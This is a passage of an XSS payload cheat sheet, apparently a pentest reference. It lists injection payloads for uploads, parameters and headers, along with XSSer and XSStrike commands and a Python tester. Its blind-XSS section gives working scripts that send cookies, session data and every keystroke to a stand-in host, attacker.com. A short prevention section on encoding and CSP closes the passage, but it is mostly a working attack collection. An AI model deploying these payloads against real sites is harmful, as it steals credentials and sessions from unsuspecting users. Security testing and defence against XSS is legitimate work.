onerror=alert('XSS')> File Upload (a stored file only fires if the application serves it inline from its own origin with an HTML or SVG content type; a real image is harmless unless the server sniffs its type) <!-- Image file --> <img src=x onerror=alert('XSS')> <!-- SVG file (needs the namespace to render as SVG when opened directly) --> <svg xmlns="http://www.w3.org/2000/svg" onload="alert('XSS')"/> <!-- HTML file --> <script>alert('XSS')</script> Reflected XSS Payloads URL Parameters <!-- GET parameter --> ?search=<script>alert('XSS')</script> ?search=<img src=x onerror=alert('XSS')> <!-- POST parameter --> username=<script>alert('XSS')</script> password=<img src=x onerror=alert('XSS')> Headers (these typically surface in log viewers or admin panels rather than the immediate response, so pair them with the blind payloads below) <!-- User-Agent --> User-Agent: <script>alert('XSS')</script> <!-- Referer --> Referer: <script>alert('XSS')</script> <!-- X-Forwarded-For --> X-Forwarded-For: <script>alert('XSS')</script> Blind XSS Payloads Data Exfiltration (use a callback host you control with an unpredictable name; HttpOnly cookies are never visible to document.cookie, so exfiltrate page content or tokens instead in that case; the value is URL-encoded so ; and = in cookies survive the query string) <!-- Basic exfiltration --> <script> var xhr = new XMLHttpRequest(); xhr.open('GET', 'http://attacker.com/steal?data=' + encodeURIComponent(document.cookie)); xhr.send(); </script> <!-- Image exfiltration (the URL must be built by script; a literal src would send the string "document.cookie", not its value) --> <img src=x onerror="this.src='http://attacker.com/steal?data='+encodeURIComponent(document.cookie)"> <!-- Form exfiltration (same: fill the value from script, then submit) --> <form id="f" action="http://attacker.com/steal" method="post"> <input type="hidden" name="data" id="d"> </form> <script>document.getElementById('d').value=document.cookie;document.getElementById('f').submit();</script> Keylogger (keypress is deprecated; keydown reports e.key for every key) <script> document.addEventListener('keydown', function(e) { var xhr = new XMLHttpRequest(); xhr.open('GET', 'http://attacker.com/keylog?key=' + encodeURIComponent(e.key)); xhr.send(); }); </script> Session Hijacking <script> var xhr = new XMLHttpRequest(); xhr.open('GET', 'http://attacker.com/session?cookie=' + encodeURIComponent(document.cookie)); xhr.send(); </script> Mobile XSS Payloads Touch Events <div ontouchstart=alert('XSS')>Touch me</div> <div ontouchend=alert('XSS')>Touch me</div> <div ontouchmove=alert('XSS')>Touch me</div> <div ontouchcancel=alert('XSS')>Touch me</div> Orientation Events <div onorientationchange=alert('XSS')>Rotate me</div> <div onresize=alert('XSS')>Resize me</div> Testing Tools XSSer # Basic scan xsser --url="http://target.com/page.php?search=test" # With payloads xsser --url="http://target.com/page.php?search=test" --payload="<script>alert('XSS')</script>" # With encoding xsser --url="http://target.com/page.php?search=test" 
--encode XSStrike # Basic scan python3 xsstrike.py -u "http://target.com/page.php?search=test" # With crawling python3 xsstrike.py -u "http://target.com/page.php?search=test" --crawl # With blind XSS python3 xsstrike.py -u "http://target.com/page.php?search=test" --blind Custom Script import requests import re def test_xss(url, param, payload): data = {param: payload} response = requests.post(url, data=data) # Reflection is not execution: an encoded echo of the payload is harmless, so confirm that it appears unencoded in a script-capable context (view-source, then a browser); matching the bare word "alert" produces false positives on ordinary page text if payload in response.text: print(f"XSS detected: {payload}") elif "alert" in response.text.lower(): print(f"XSS detected: {payload}") # Test payloads payloads = [ "<script>alert('XSS')</script>", "<img src=x onerror=alert('XSS')>", "<svg onload=alert('XSS')>", "<iframe onload=alert('XSS')>" ] for payload in payloads: test_xss("http://target.com/search.php", "query", payload) Prevention and Mitigation Input Validation # Whitelist validation (defence in depth only; contextual output encoding is the primary control) import re def validate_input(input_str): # Allow only alphanumeric and basic punctuation; fullmatch is used because $ with re.match also accepts a trailing newline pattern = r'[a-zA-Z0-9\s.,!?]+' return re.fullmatch(pattern, input_str) is not None Output Encoding import html def encode_output(input_str): # Correct for HTML element content and quoted attribute values (quote=True is the default); data placed inside JavaScript, URLs or CSS needs that context's own encoding return html.escape(input_str) Content Security Policy <!-- Strict CSP ('unsafe-inline' would switch inline-script blocking off, so a strict policy omits it; prefer the HTTP header over a <meta> tag, which cannot carry frame-ancestors or reporting directives) --> <meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'self';"> <!-- Nonce-based CSP (the nonce must be a fresh, cryptographically random value generated per response and copied onto each legitimate <script>; a fixed string such as "random" is exactly the static-nonce misconfiguration the bypass section relies on) --> <meta http-equiv="Content-Security-Policy" content="script-src 'self' 'nonce-<per-response-random-value>'"> Testing Checklist Test all input fields Test with different HTTP methods Test with different content types Test with different encodings Test with different quote types Test with different event handlers Test with different tag types Test with different bypass techniques Test with different WAF bypasses Test with different CSP bypasses
